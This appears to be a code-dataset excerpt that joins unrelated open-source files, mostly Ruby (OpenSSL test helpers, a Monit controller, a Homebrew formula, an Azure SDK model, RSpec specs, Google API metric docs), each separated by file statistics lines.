if line =~ %r{^([\d\w/]+)\s+(\d+)\s+(\d+)\s+(\d+)\s+([\d\%]+)}
mdev = $1
memory[:swap][mdev] = Mash.new
memory[:swap][mdev][:total] = $2
memory[:swap][mdev][:used] = $3
memory[:swap][mdev][:free] = $4
memory[:swap][mdev][:percent_free] = $5
end
end
end
end
| 40.2 | 77 | 0.644693 |
383201ce6513a08d3ef3b5730bb6828d9480e01f | 4,606 | #########################################
# This class provide methods to install, index, or update internal databases
#########################################
class DatabasesSupportInternal < DatabasesSupport
#INIT
def initialize(dir,info)
#First SET provided databases constant
load_repository_info(dir)
#Load previous info from JSON, if exists. Or create new info structure
if File.exist?(File.join(dir,'status_info','databases_status_info.json'))
load_info = JSON.parse(File.read(File.join(dir,'status_info','databases_status_info.json')))
#Merge! loaded info
info.merge!(load_info)
#Init exit trigger
@exit_trigger = false
else
super(info)
info['dir'] = dir
info['installed_databases'] = Array.new
end
end
#SET DEFAULT DATABASES
def set_databases?(action,list,info)
# Replace, remove, add
if !list.empty? && list[0].to_s.downcase != 'default'
super
#save switch
info['modified'] = true
#Set by default
else
if list[0].to_s.downcase == 'default' || info['databases'].empty?
info['databases'] = @@repo_info['databases'].sort
info['modified'] = true
end
end
end
#CHECKS STRUCTURE
def check_structure(dir)
#Build DB structure if it's not present. Exit if dir is not writable by user
['','fastas','indices','status_info'].map { |d| File.join(dir,d) }.select{ |d| !Dir.exist?(d) }.each do |directory|
if File.writable?(File.dirname(directory))
Dir.mkdir(directory)
else
STDERR.puts "ERROR. Writing permissions error, unable to create essential databases structure folder #{directory} at: #{File.dirname(dir)}"
exit(-1)
end
end
end
#CHECK INFO
def check_databases(databases,info,bbtools)
databases = databases.split(/ |,/) if !databases.is_a?(Array)
if databases.empty?
STDERR.puts "WARNING. No databases to check."
return
end
#Info
STDERR.puts "Checking databases status at #{info['dir']}"
#Get info about installation
installation_status = check_installation_status(info['dir'],databases)
installation_status['installed'].each { |db| info['installed_databases'].push(db) if !info['installed_databases'].include?(db) }
if !installation_status['failed'].empty?
STDERR.puts "ERROR. Databases: #{installation_status['failed'].join(" ")} are empty or not installed.\n Databases can be installed (or reinstalled) with --install_databases option."
installation_status['failed'].each { |db| info['installed_databases'].delete(db) if info['installed'].include?(db) }
@exit_trigger = true
return
end
# if !installation_status['obsolete'].empty?
# STDERR.puts "WARNING. Databases: #{installation_status['obsolete']} are NOT updated. You can update them with -i update"
# end
#Check internal databases status
databases.each do |db|
check_database_status(db,info,get_current_fastas(db,info['dir']))
end
#Get info for obsolete databases
if !info['obsolete_databases'].empty?
STDERR.puts "The following databases indices are obsolete:\n #{info['obsolete_databases'].join("\n\s")}"
get_dbs_info(info['obsolete_databases'].select { |d| databases.include?(d) },info)
info['modified'] = true
#Check writing permissions
if !File.writable?(File.join(info['dir'],'indices')) || !File.writable?(File.join(info['dir'],'status_info'))
STDERR.puts "ERROR!. Impossible to update databases (#{info['obsolete_databases'].join(" ")}) index because folders: #{File.join(info['dir'],'indices')} and/or #{File.join(info['dir'],'status_info')} are not writable. Please contact your admin to update your databases or add -c tag to avoid this step."
exit(-1)
else
#Update index!
update_index(info['obsolete_databases'].select { |d| databases.include?(d) },info,bbtools)
end
else
STDERR.puts "All databases indices are updated"
end
end
#Get current fastas
def get_current_fastas(db,dir)
return Dir[File.join(dir,'fastas',db,"*.fasta*")].sort
end
#GET DATABASES INFO
def get_dbs_info(databases,info)
databases = databases.split(/ |,/) if !databases.is_a?(Array)
databases.each do |db_name|
# DB name
info[db_name]['name'] = db_name
#LOAD (or re-load) PATHS
#Fastas folder path
info[db_name]['path'] = File.join(info['dir'],'fastas',db_name)
#Index path
info[db_name]['index'] = File.join(info['dir'],'indices',db_name)
#Error file path
info[db_name]['update_error_file'] = File.join(info['dir'],'status_info','update_stderror_'+db_name+'.txt')
end
#STATUS INFO(fastas,size,name...)
super
end
end | 39.367521 | 307 | 0.681068 |
ab0512e905f5c323c0f2e8583a5ef9bbb65e959d | 3,098 | module Luban
module Deployment
module Packages
class Monit
class Controller < Luban::Deployment::Service::Controller
module Commands
module Public
def monitor_control_file_name
@monitor_control_file_name ||= 'monitrc'
end
def monit_command
@monit_command ||= "#{monitor_executable} -c #{monitor_control_file_path}"
end
def monitor_command(service_entry)
@monitor_command ||= shell_command("#{monit_command} monitor #{service_entry}")
end
def unmonitor_command(service_entry)
@unmonitor_command ||= shell_command("#{monit_command} unmonitor #{service_entry}")
end
def reload_monitor_command
@reload_monitor_command ||= shell_command("#{monit_command} reload")
end
def check_monitor_command(service_entry, summary: false)
shell_command("#{monit_command} #{summary ? :summary : :status} #{service_entry}")
end
end
include Public
def self.included(base)
base.define_executable 'monit'
end
def process_pattern
@process_pattern ||= "^#{monit_command}"
end
def start_command
@start_command ||= shell_command(monit_command, setup: [])
end
def stop_command
@stop_command ||= shell_command("#{monit_command} quit", setup: [])
end
end
include Commands
alias_method :monitor_executable, :monit_executable
alias_method :monitor_control_file_path, :control_file_path
alias_method :control_file_name, :monitor_control_file_name
def process_stopped?
super and check_process! =~ /the monit daemon is not running$/
end
def process_started?
super and check_process! =~ /^Monit #{package_major_version} uptime:|^Monit uptime:|^The Monit daemon #{package_major_version} uptime:/
end
%i(config_test match_process monitor_process unmonitor_process reload_process).each do |m|
define_method(m) { update_result send("#{__method__}!") }
end
protected
def config_test!
capture(shell_command("#{monit_command} -t"))
end
def check_process!
capture(check_monitor_command(task.args.service_entry, summary: task.opts.summary))
end
def match_process!
capture(shell_command("#{monit_command} procmatch #{task.args.pattern}"))
end
def monitor_process!
capture(monitor_command(task.args.service_entry))
end
def unmonitor_process!
capture(unmonitor_command(task.args.service_entry))
end
def reload_process!
capture(reload_monitor_command)
end
end
end
end
end
end
| 30.98 | 147 | 0.581988 |
1af8f12979c9b601bda60beb10668f8e539ec18b | 91 | require "camome_gc_watcher/version"
module CamomeGcWatcher
# Your code goes here...
end
| 15.166667 | 35 | 0.78022 |
acece9791142015984703dcbb07edacd40fa2f9b | 11,684 | # frozen_string_literal: true
begin
require "openssl"
# Disable FIPS mode for tests for installations
# where FIPS mode would be enabled by default.
# Has no effect on all other installations.
OpenSSL.fips_mode=false
rescue LoadError
end
# Compile OpenSSL with crypto-mdebug and run this test suite with OSSL_MDEBUG=1
# environment variable to enable memory leak check.
if ENV["OSSL_MDEBUG"] == "1"
if OpenSSL.respond_to?(:print_mem_leaks)
OpenSSL.mem_check_start
END {
GC.start
case OpenSSL.print_mem_leaks
when nil
warn "mdebug: check what is printed"
when true
raise "mdebug: memory leaks detected"
end
}
else
warn "OSSL_MDEBUG=1 is specified but OpenSSL is not built with crypto-mdebug"
end
end
require "test/unit"
require "tempfile"
require "socket"
require "envutil"
if defined?(OpenSSL)
module OpenSSL::TestUtils
module Fixtures
module_function
def pkey(name)
OpenSSL::PKey.read(read_file("pkey", name))
rescue OpenSSL::PKey::PKeyError
# TODO: DH parameters can be read by OpenSSL::PKey.read atm
OpenSSL::PKey::DH.new(read_file("pkey", name))
end
def read_file(category, name)
@file_cache ||= {}
@file_cache[[category, name]] ||=
File.read(File.join(__dir__, "fixtures", category, name + ".pem"))
end
def file_path(category, name)
File.join(__dir__, "fixtures", category, name)
end
end
module_function
def generate_cert(dn, key, serial, issuer,
not_before: nil, not_after: nil)
cert = OpenSSL::X509::Certificate.new
issuer = cert unless issuer
cert.version = 2
cert.serial = serial
cert.subject = dn
cert.issuer = issuer.subject
cert.public_key = key
now = Time.now
cert.not_before = not_before || now - 3600
cert.not_after = not_after || now + 3600
cert
end
def issue_cert(dn, key, serial, extensions, issuer, issuer_key,
not_before: nil, not_after: nil, digest: "sha256")
cert = generate_cert(dn, key, serial, issuer,
not_before: not_before, not_after: not_after)
issuer = cert unless issuer
issuer_key = key unless issuer_key
ef = OpenSSL::X509::ExtensionFactory.new
ef.subject_certificate = cert
ef.issuer_certificate = issuer
extensions.each{|oid, value, critical|
cert.add_extension(ef.create_extension(oid, value, critical))
}
cert.sign(issuer_key, digest)
cert
end
def issue_crl(revoke_info, serial, lastup, nextup, extensions,
issuer, issuer_key, digest)
crl = OpenSSL::X509::CRL.new
crl.issuer = issuer.subject
crl.version = 1
crl.last_update = lastup
crl.next_update = nextup
revoke_info.each{|rserial, time, reason_code|
revoked = OpenSSL::X509::Revoked.new
revoked.serial = rserial
revoked.time = time
enum = OpenSSL::ASN1::Enumerated(reason_code)
ext = OpenSSL::X509::Extension.new("CRLReason", enum)
revoked.add_extension(ext)
crl.add_revoked(revoked)
}
ef = OpenSSL::X509::ExtensionFactory.new
ef.issuer_certificate = issuer
ef.crl = crl
crlnum = OpenSSL::ASN1::Integer(serial)
crl.add_extension(OpenSSL::X509::Extension.new("crlNumber", crlnum))
extensions.each{|oid, value, critical|
crl.add_extension(ef.create_extension(oid, value, critical))
}
crl.sign(issuer_key, digest)
crl
end
def get_subject_key_id(cert, hex: true)
asn1_cert = OpenSSL::ASN1.decode(cert)
tbscert = asn1_cert.value[0]
pkinfo = tbscert.value[6]
publickey = pkinfo.value[1]
pkvalue = publickey.value
digest = OpenSSL::Digest::SHA1.digest(pkvalue)
if hex
digest.unpack("H2"*20).join(":").upcase
else
digest
end
end
def openssl?(major = nil, minor = nil, fix = nil, patch = 0)
return false if OpenSSL::OPENSSL_VERSION.include?("LibreSSL")
return true unless major
OpenSSL::OPENSSL_VERSION_NUMBER >=
major * 0x10000000 + minor * 0x100000 + fix * 0x1000 + patch * 0x10
end
def libressl?(major = nil, minor = nil, fix = nil)
version = OpenSSL::OPENSSL_VERSION.scan(/LibreSSL (\d+)\.(\d+)\.(\d+).*/)[0]
return false unless version
!major || (version.map(&:to_i) <=> [major, minor, fix]) >= 0
end
end
class OpenSSL::TestCase < Test::Unit::TestCase
include OpenSSL::TestUtils
extend OpenSSL::TestUtils
def setup
if ENV["OSSL_GC_STRESS"] == "1"
GC.stress = true
end
end
def teardown
if ENV["OSSL_GC_STRESS"] == "1"
GC.stress = false
end
# OpenSSL error stack must be empty
assert_equal([], OpenSSL.errors)
end
end
class OpenSSL::SSLTestCase < OpenSSL::TestCase
RUBY = EnvUtil.rubybin
ITERATIONS = ($0 == __FILE__) ? 100 : 10
def setup
super
@ca_key = Fixtures.pkey("rsa-1")
@svr_key = Fixtures.pkey("rsa-2")
@cli_key = Fixtures.pkey("rsa-3")
@ca = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/CN=CA")
@svr = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/CN=localhost")
@cli = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/CN=localhost")
ca_exts = [
["basicConstraints","CA:TRUE",true],
["keyUsage","cRLSign,keyCertSign",true],
]
ee_exts = [
["keyUsage","keyEncipherment,digitalSignature",true],
]
@ca_cert = issue_cert(@ca, @ca_key, 1, ca_exts, nil, nil)
@svr_cert = issue_cert(@svr, @svr_key, 2, ee_exts, @ca_cert, @ca_key)
@cli_cert = issue_cert(@cli, @cli_key, 3, ee_exts, @ca_cert, @ca_key)
@server = nil
end
def tls12_supported?
ctx = OpenSSL::SSL::SSLContext.new
ctx.min_version = ctx.max_version = OpenSSL::SSL::TLS1_2_VERSION
true
rescue
end
def readwrite_loop(ctx, ssl)
while line = ssl.gets
ssl.write(line)
end
end
def start_server(verify_mode: OpenSSL::SSL::VERIFY_NONE, start_immediately: true,
ctx_proc: nil, server_proc: method(:readwrite_loop),
accept_proc: proc{},
ignore_listener_error: false, &block)
IO.pipe {|stop_pipe_r, stop_pipe_w|
store = OpenSSL::X509::Store.new
store.add_cert(@ca_cert)
store.purpose = OpenSSL::X509::PURPOSE_SSL_CLIENT
ctx = OpenSSL::SSL::SSLContext.new
ctx.cert_store = store
ctx.cert = @svr_cert
ctx.key = @svr_key
ctx.tmp_dh_callback = proc { Fixtures.pkey("dh-1") }
ctx.verify_mode = verify_mode
ctx_proc.call(ctx) if ctx_proc
Socket.do_not_reverse_lookup = true
tcps = TCPServer.new("127.0.0.1", 0)
port = tcps.connect_address.ip_port
ssls = OpenSSL::SSL::SSLServer.new(tcps, ctx)
ssls.start_immediately = start_immediately
threads = []
begin
server_thread = Thread.new do
if Thread.method_defined?(:report_on_exception=) # Ruby >= 2.4
Thread.current.report_on_exception = false
end
begin
loop do
begin
readable, = IO.select([ssls, stop_pipe_r])
break if readable.include? stop_pipe_r
ssl = ssls.accept
accept_proc.call(ssl)
rescue OpenSSL::SSL::SSLError, IOError, Errno::EBADF, Errno::EINVAL,
Errno::ECONNABORTED, Errno::ENOTSOCK, Errno::ECONNRESET
retry if ignore_listener_error
raise
end
th = Thread.new do
if Thread.method_defined?(:report_on_exception=)
Thread.current.report_on_exception = false
end
begin
server_proc.call(ctx, ssl)
ensure
ssl.close
end
true
end
threads << th
end
ensure
tcps.close
end
end
client_thread = Thread.new do
if Thread.method_defined?(:report_on_exception=)
Thread.current.report_on_exception = false
end
begin
block.call(port)
ensure
# Stop accepting new connection
stop_pipe_w.close
server_thread.join
end
end
threads.unshift client_thread
ensure
# Terminate existing connections. If a thread did 'pend', re-raise it.
pend = nil
threads.each { |th|
begin
timeout = EnvUtil.apply_timeout_scale(30)
th.join(timeout) or
th.raise(RuntimeError, "[start_server] thread did not exit in #{timeout} secs")
rescue (defined?(MiniTest::Skip) ? MiniTest::Skip : Test::Unit::PendedError)
# MiniTest::Skip is for the Ruby tree
pend = $!
rescue Exception
end
}
raise pend if pend
assert_join_threads(threads)
end
}
end
end
class OpenSSL::PKeyTestCase < OpenSSL::TestCase
def check_component(base, test, keys)
keys.each { |comp|
assert_equal base.send(comp), test.send(comp)
}
end
def dup_public(key)
case key
when OpenSSL::PKey::RSA
rsa = OpenSSL::PKey::RSA.new
rsa.set_key(key.n, key.e, nil)
rsa
when OpenSSL::PKey::DSA
dsa = OpenSSL::PKey::DSA.new
dsa.set_pqg(key.p, key.q, key.g)
dsa.set_key(key.pub_key, nil)
dsa
when OpenSSL::PKey::DH
dh = OpenSSL::PKey::DH.new
dh.set_pqg(key.p, nil, key.g)
dh
else
if defined?(OpenSSL::PKey::EC) && OpenSSL::PKey::EC === key
ec = OpenSSL::PKey::EC.new(key.group)
ec.public_key = key.public_key
ec
else
raise "unknown key type"
end
end
end
end
module OpenSSL::Certs
include OpenSSL::TestUtils
module_function
def ca_cert
ca = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/CN=Timestamp Root CA")
ca_exts = [
["basicConstraints","CA:TRUE,pathlen:1",true],
["keyUsage","keyCertSign, cRLSign",true],
["subjectKeyIdentifier","hash",false],
["authorityKeyIdentifier","keyid:always",false],
]
OpenSSL::TestUtils.issue_cert(ca, Fixtures.pkey("rsa2048"), 1, ca_exts, nil, nil)
end
def ts_cert_direct(key, ca_cert)
dn = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/OU=Timestamp/CN=Server Direct")
exts = [
["basicConstraints","CA:FALSE",true],
["keyUsage","digitalSignature, nonRepudiation", true],
["subjectKeyIdentifier", "hash",false],
["authorityKeyIdentifier","keyid,issuer", false],
["extendedKeyUsage", "timeStamping", true]
]
OpenSSL::TestUtils.issue_cert(dn, key, 2, exts, ca_cert, Fixtures.pkey("rsa2048"))
end
def intermediate_cert(key, ca_cert)
dn = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/OU=Timestamp/CN=Timestamp Intermediate CA")
exts = [
["basicConstraints","CA:TRUE,pathlen:0",true],
["keyUsage","keyCertSign, cRLSign",true],
["subjectKeyIdentifier","hash",false],
["authorityKeyIdentifier","keyid:always",false],
]
OpenSSL::TestUtils.issue_cert(dn, key, 3, exts, ca_cert, Fixtures.pkey("rsa2048"))
end
def ts_cert_ee(key, intermediate, im_key)
dn = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/OU=Timestamp/CN=Server End Entity")
exts = [
["keyUsage","digitalSignature, nonRepudiation", true],
["subjectKeyIdentifier", "hash",false],
["authorityKeyIdentifier","keyid,issuer", false],
["extendedKeyUsage", "timeStamping", true]
]
OpenSSL::TestUtils.issue_cert(dn, key, 4, exts, intermediate, im_key)
end
end
end
| 29.356784 | 100 | 0.623331 |
b9947b9144484694ac304807025332f0bde22e08 | 1,396 | # table_catalog | postgres_to_redshift
# table_schema | public
# table_name | acquisition_pages
# table_type | BASE TABLE
# self_referencing_column_name |
# reference_generation |
# user_defined_type_catalog |
# user_defined_type_schema |
# user_defined_type_name |
# is_insertable_into | YES
# is_typed | NO
# commit_action |
#
class Helper
class Table
attr_accessor :attributes, :columns
def initialize(attributes: , columns: [])
self.attributes = attributes
self.columns = columns
end
def name
attributes["table_name"]
end
alias_method :to_s, :name
def target_table_name
name.gsub(/_view$/, '')
end
def columns=(column_definitions = [])
@columns = column_definitions.map do |column_definition|
Column.new(attributes: column_definition)
end
end
def columns_for_create
columns.map do |column|
column.name == 'id' ? %Q["#{column.name}" #{column.data_type_for_copy} sortkey distkey] : %Q["#{column.name}" #{column.data_type_for_copy}]
end.join(", ")
end
def columns_for_copy
columns.map do |column|
column.name_for_copy
end.join(", ")
end
def is_view?
attributes["table_type"] == "VIEW"
end
end
end
| 25.381818 | 147 | 0.603868 |
38bf41dc89360ca35d7eb7d50b304040471c9146 | 971 | require 'spec_helper'
describe Wombat do
it 'should provide syntactic sugar method Wombat.crawl' do
Wombat.should respond_to(:crawl)
end
it 'should provide syntactic sugar method Wombat.scrape' do
Wombat.should respond_to(:scrape)
end
it 'should redirect .scrape to .crawl' do
fake_class = double :fake
fake_class.stub :include
fake_class.should_receive(:new).and_return(double(crawl: nil))
Class.stub :new => fake_class
Wombat.scrape
end
it 'should provide configuration method with block' do
Wombat.configure do |config|
config.set_proxy "10.0.0.1", 8080
end
Wombat.proxy_args.should == ["10.0.0.1", 8080]
end
it 'should accept regular properties (non-selectors)' do
VCR.use_cassette('broken_selector') do
lambda {
Wombat.crawl do
base_url "http://www.github.com"
path "/"
source :obaoba
description 'Oba Oba'
website 'http://obaoba.com.br'
end
}.should_not raise_error
end
end
end | 23.682927 | 64 | 0.709578 |
18d8122474df8042e0cc0a0bd6d8b4b18e8cabb5 | 199 | # Copyright (c) 2010-2011, Diaspora Inc. This file is
# licensed under the Affero General Public License version 3 or later. See
# the COPYRIGHT file.
module Diaspora
autoload :Parser
end
| 24.875 | 77 | 0.733668 |
e834fa9b640a76ab619fec4fc8dcfcb9d6cbbf2b | 1,695 | require 'spec_helper'
describe TeamMembersController do
before do
@team = Factory(:team)
@user = Factory(:user)
@admin = Factory(:team_member, :user => @user, :team => @team, :admin => true)
sign_in @user
end
describe 'update' do
it 'should promote if user was not admin on success' do
person = Factory(:person)
user = Factory(:user, :person => person)
request.env['HTTP_REFERER'] = '/art-application/people'
team_member = Factory(:team_member, :team => @team, :user => user, :admin => false)
put :update, :id => team_member.id
flash[:success].should == "#{team_member.user.person.name} has been promoted to admin for #{@team.name}"
end
it 'should demote if user was admin on success' do
person = Factory(:person)
user = Factory(:user, :person => person)
request.env['HTTP_REFERER'] = '/art-application/people'
team_member = Factory(:team_member, :team => @team, :user => user, :admin => true)
put :update, :id => team_member.id
flash[:success].should == "#{team_member.user.person.name} has been demoted from admin of #{@team.name}"
end
it 'should render flash[:error] if current user is not admin' do
@admin.admin = false
@admin.save!
person = Factory(:person)
user = Factory(:user, :person => person)
request.env['HTTP_REFERER'] = '/art-application/people'
team_member = Factory(:team_member, :team => @team, :user => user)
put :update, :id => team_member.id
flash[:error].should == 'You gotta have power to promote folks around here'
end
end
pending 'toggle_admin_status'
pending 'promote'
pending 'demote'
end
| 36.847826 | 110 | 0.641298 |
bbebf3cd68dc65406e95744c5b60e12a5de84a29 | 3,198 | class Goolabs < Formula
desc "Command-line tool for morphologically analyzing Japanese language"
homepage "https://pypi.python.org/pypi/goolabs"
url "https://files.pythonhosted.org/packages/ce/86/2d3b5bd85311ee3a7ae7a661b3619095431503cd0cae03048c646b700cad/goolabs-0.4.0.tar.gz"
sha256 "4f768a5b98960c507f5ba4e1ca14d45e3139388669148a2750d415c312281527"
revision 1
bottle do
cellar :any_skip_relocation
sha256 "f2bdf5b949e9e088544c083e495d9e1b78374a9fadb8c22ab78d41288c0709ef" => :catalina
sha256 "56e26842d65342cb5aeb31c22a07bb64e5b04349c8ab17b7085d13bd19923305" => :mojave
sha256 "a3228c96960feacfa6a7f6e637261c4214600da27ce48e2fafa73d009c2401a7" => :high_sierra
sha256 "1e49980130952d980e63548980b6c37163e5e540d833f8d50745595d8d45eaee" => :sierra
end
depends_on "python"
resource "certifi" do
url "https://files.pythonhosted.org/packages/23/3f/8be01c50ed24a4bd6b8da799839066ce0288f66f5e11f0367323467f0cbc/certifi-2017.11.5.tar.gz"
sha256 "5ec74291ca1136b40f0379e1128ff80e866597e4e2c1e755739a913bbc3613c0"
end
resource "chardet" do
url "https://files.pythonhosted.org/packages/fc/bb/a5768c230f9ddb03acc9ef3f0d4a3cf93462473795d18e9535498c8f929d/chardet-3.0.4.tar.gz"
sha256 "84ab92ed1c4d4f16916e05906b6b75a6c0fb5db821cc65e70cbd64a3e2a5eaae"
end
resource "click" do
url "https://files.pythonhosted.org/packages/95/d9/c3336b6b5711c3ab9d1d3a80f1a3e2afeb9d8c02a7166462f6cc96570897/click-6.7.tar.gz"
sha256 "f15516df478d5a56180fbf80e68f206010e6d160fc39fa508b65e035fd75130b"
end
resource "idna" do
url "https://files.pythonhosted.org/packages/f4/bd/0467d62790828c23c47fc1dfa1b1f052b24efdf5290f071c7a91d0d82fd3/idna-2.6.tar.gz"
sha256 "2c6a5de3089009e3da7c5dde64a141dbc8551d5b7f6cf4ed7c2568d0cc520a8f"
end
resource "requests" do
url "https://files.pythonhosted.org/packages/b0/e1/eab4fc3752e3d240468a8c0b284607899d2fbfb236a56b7377a329aa8d09/requests-2.18.4.tar.gz"
sha256 "9c443e7324ba5b85070c4a818ade28bfabedf16ea10206da1132edaa6dda237e"
end
resource "six" do
url "https://files.pythonhosted.org/packages/16/d8/bc6316cf98419719bd59c91742194c111b6f2e85abac88e496adefaf7afe/six-1.11.0.tar.gz"
sha256 "70e8a77beed4562e7f14fe23a786b54f6296e34344c23bc42f07b15018ff98e9"
end
resource "urllib3" do
url "https://files.pythonhosted.org/packages/ee/11/7c59620aceedcc1ef65e156cc5ce5a24ef87be4107c2b74458464e437a5d/urllib3-1.22.tar.gz"
sha256 "cc44da8e1145637334317feebd728bd869a35285b93cbb4cca2577da7e62db4f"
end
def install
xy = Language::Python.major_minor_version "python3"
ENV["PYTHONPATH"] = libexec/"vendor/lib/python#{xy}/site-packages"
ENV.prepend_create_path "PYTHONPATH", libexec/"lib/python#{xy}/site-packages"
resources.each do |r|
r.stage do
system "python3", *Language::Python.setup_install_args(libexec/"vendor")
end
end
system "python3", *Language::Python.setup_install_args(libexec)
bin.install Dir["#{libexec}/bin/*"]
bin.env_script_all_files(libexec/"bin", :PYTHONPATH => ENV["PYTHONPATH"])
end
test do
assert_match "Usage: goolabs morph", shell_output("#{bin}/goolabs morph test 2>&1", 2)
end
end
| 43.216216 | 141 | 0.799875 |
f7704e61b4e00b79674d343bc482d6bf187d2a66 | 3,374 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::MediaServices::Mgmt::V2018_03_30_preview
module Models
#
# Describes all the settings to be used when encoding the input video with
# the Standard Encoder.
#
class StandardEncoderPreset < Preset
include MsRestAzure
def initialize
@odatatype = "#Microsoft.Media.StandardEncoderPreset"
end
attr_accessor :odatatype
# @return [Filters] One or more filtering operations that are applied to
# the input media before encoding.
attr_accessor :filters
# @return [Array<Codec>] The list of codecs to be used when encoding the
# input video.
attr_accessor :codecs
# @return [Array<Format>] The list of outputs to be produced by the
# encoder.
attr_accessor :formats
#
# Mapper for StandardEncoderPreset class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: '#Microsoft.Media.StandardEncoderPreset',
type: {
name: 'Composite',
class_name: 'StandardEncoderPreset',
model_properties: {
odatatype: {
client_side_validation: true,
required: true,
serialized_name: '@odata\\.type',
type: {
name: 'String'
}
},
filters: {
client_side_validation: true,
required: false,
serialized_name: 'filters',
type: {
name: 'Composite',
class_name: 'Filters'
}
},
codecs: {
client_side_validation: true,
required: false,
serialized_name: 'codecs',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'CodecElementType',
type: {
name: 'Composite',
polymorphic_discriminator: '@odata.type',
uber_parent: 'Codec',
class_name: 'Codec'
}
}
}
},
formats: {
client_side_validation: true,
required: false,
serialized_name: 'formats',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'FormatElementType',
type: {
name: 'Composite',
polymorphic_discriminator: '@odata.type',
uber_parent: 'Format',
class_name: 'Format'
}
}
}
}
}
}
}
end
end
end
end
| 30.396396 | 78 | 0.474215 |
1ab474dcc593da0e9eae9ce543d3256b0fbce284 | 623 | require 'tok'
require 'rails'
module Tok
class Engine < Rails::Engine
isolate_namespace Tok
initializer :append_migrations do |app|
if model_exist?
config.paths["db/migrate"].expanded.each do |expanded_path|
app.config.paths["db/migrate"] << expanded_path
end
end
end
initializer :filter_params do |app|
app.config.filter_parameters += [:encrypted_password, :password, :authentication_token, :token]
end
private
def model_exist?
Rails.env.test? ? true : File.exist?(File.expand_path('app/models/user.rb', Rails.root))
end
end
end
| 23.074074 | 101 | 0.664526 |
91487a72bc58875f1926ad7caeadf20465a8412a | 10,959 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Google
module Api
# Defines a metric type and its schema. Once a metric descriptor is created,
# deleting or altering it stops data collection and makes the metric type's
# existing data unusable.
# @!attribute [rw] name
# @return [String]
# The resource name of the metric descriptor.
# @!attribute [rw] type
# @return [String]
# The metric type, including its DNS name prefix. The type is not
# URL-encoded. All user-defined metric types have the DNS name
# `custom.googleapis.com` or `external.googleapis.com`. Metric types should
# use a natural hierarchical grouping. For example:
#
# "custom.googleapis.com/invoice/paid/amount"
# "external.googleapis.com/prometheus/up"
# "appengine.googleapis.com/http/server/response_latencies"
# @!attribute [rw] labels
# @return [Array<Google::Api::LabelDescriptor>]
# The set of labels that can be used to describe a specific
# instance of this metric type. For example, the
# `appengine.googleapis.com/http/server/response_latencies` metric
# type has a label for the HTTP response code, `response_code`, so
# you can look at latencies for successful responses or just
# for responses that failed.
# @!attribute [rw] metric_kind
# @return [Google::Api::MetricDescriptor::MetricKind]
# Whether the metric records instantaneous values, changes to a value, etc.
# Some combinations of `metric_kind` and `value_type` might not be supported.
# @!attribute [rw] value_type
# @return [Google::Api::MetricDescriptor::ValueType]
# Whether the measurement is an integer, a floating-point number, etc.
# Some combinations of `metric_kind` and `value_type` might not be supported.
# @!attribute [rw] unit
# @return [String]
# The units in which the metric value is reported. It is only applicable
# if the `value_type` is `INT64`, `DOUBLE`, or `DISTRIBUTION`. The `unit`
# defines the representation of the stored metric values.
#
# Different systems may scale the values to be more easily displayed (so a
# value of `0.02KBy` _might_ be displayed as `20By`, and a value of
# `3523KBy` _might_ be displayed as `3.5MBy`). However, if the `unit` is
# `KBy`, then the value of the metric is always in thousands of bytes, no
# matter how it may be displayed..
#
# If you want a custom metric to record the exact number of CPU-seconds used
# by a job, you can create an `INT64 CUMULATIVE` metric whose `unit` is
# `s{CPU}` (or equivalently `1s{CPU}` or just `s`). If the job uses 12,005
# CPU-seconds, then the value is written as `12005`.
#
# Alternatively, if you want a custome metric to record data in a more
# granular way, you can create a `DOUBLE CUMULATIVE` metric whose `unit` is
# `ks{CPU}`, and then write the value `12.005` (which is `12005/1000`),
# or use `Kis{CPU}` and write `11.723` (which is `12005/1024`).
#
# The supported units are a subset of [The Unified Code for Units of
# Measure](http://unitsofmeasure.org/ucum.html) standard:
#
# **Basic units (UNIT)**
#
# * `bit` bit
# * `By` byte
# * `s` second
# * `min` minute
# * `h` hour
# * `d` day
#
# **Prefixes (PREFIX)**
#
# * `k` kilo (10^3)
# * `M` mega (10^6)
# * `G` giga (10^9)
# * `T` tera (10^12)
# * `P` peta (10^15)
# * `E` exa (10^18)
# * `Z` zetta (10^21)
# * `Y` yotta (10^24)
#
# * `m` milli (10^-3)
# * `u` micro (10^-6)
# * `n` nano (10^-9)
# * `p` pico (10^-12)
# * `f` femto (10^-15)
# * `a` atto (10^-18)
# * `z` zepto (10^-21)
# * `y` yocto (10^-24)
#
# * `Ki` kibi (2^10)
# * `Mi` mebi (2^20)
# * `Gi` gibi (2^30)
# * `Ti` tebi (2^40)
# * `Pi` pebi (2^50)
#
# **Grammar**
#
# The grammar also includes these connectors:
#
# * `/` division or ratio (as an infix operator). For examples,
# `kBy/{email}` or `MiBy/10ms` (although you should almost never
# have `/s` in a metric `unit`; rates should always be computed at
# query time from the underlying cumulative or delta value).
# * `.` multiplication or composition (as an infix operator). For
# examples, `GBy.d` or `k{watt}.h`.
#
# The grammar for a unit is as follows:
#
# Expression = Component { "." Component } { "/" Component } ;
#
# Component = ( [ PREFIX ] UNIT | "%" ) [ Annotation ]
# | Annotation
# | "1"
# ;
#
# Annotation = "{" NAME "}" ;
#
# Notes:
#
# * `Annotation` is just a comment if it follows a `UNIT`. If the annotation
# is used alone, then the unit is equivalent to `1`. For examples,
# `{request}/s == 1/s`, `By{transmitted}/s == By/s`.
